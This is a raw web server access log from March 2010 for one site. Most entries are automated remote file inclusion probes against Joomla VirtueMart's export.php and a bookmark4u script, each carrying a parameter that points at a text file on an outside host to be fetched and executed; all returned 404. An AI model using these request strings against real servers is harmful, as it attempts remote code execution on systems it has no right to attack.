112.76.72.3 - - [08/Mar/2010:15:50:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
112.76.72.3 - - [08/Mar/2010:15:50:22 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
112.76.72.3 - - [08/Mar/2010:15:50:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
207.46.204.235 - - [08/Mar/2010:15:56:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.206 - - [08/Mar/2010:15:57:35 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.204.235 - - [08/Mar/2010:15:57:41 -0800] "GET /logs/access_100125.log HTTP/1.1" 200 403517 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
207.46.199.183 - - [08/Mar/2010:16:02:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:03:33 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:03:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:03:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:04:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:04:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:16:04:14 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [08/Mar/2010:16:10:14 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:12:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:12:56 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:12:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:13:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:13:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:13:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:14:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:14:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:14:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:06 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:08 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:08 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:08 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:10 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:10 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:11 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:27 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.231.60.116 - - [08/Mar/2010:16:14:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:37 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:14:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.194 - - [08/Mar/2010:16:16:45 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:34 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
99.57.90.154 - - [08/Mar/2010:16:21:19 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
99.57.90.154 - - [08/Mar/2010:16:21:19 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
99.57.90.154 - - [08/Mar/2010:16:21:19 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:21 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:43 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:21:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:21:50 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:21:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:57 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:58 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:21:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:22:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:22:09 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:22:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:22:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:22:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:22:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [08/Mar/2010:16:22:45 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [08/Mar/2010:16:22:45 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [08/Mar/2010:16:22:45 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.218.209.245 - - [08/Mar/2010:16:22:47 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.218.209.245 - - [08/Mar/2010:16:22:47 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.218.209.245 - - [08/Mar/2010:16:22:47 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:57 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.205 - - [08/Mar/2010:16:24:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:27:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:27:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:27:47 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:29:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:29:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:29:08 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
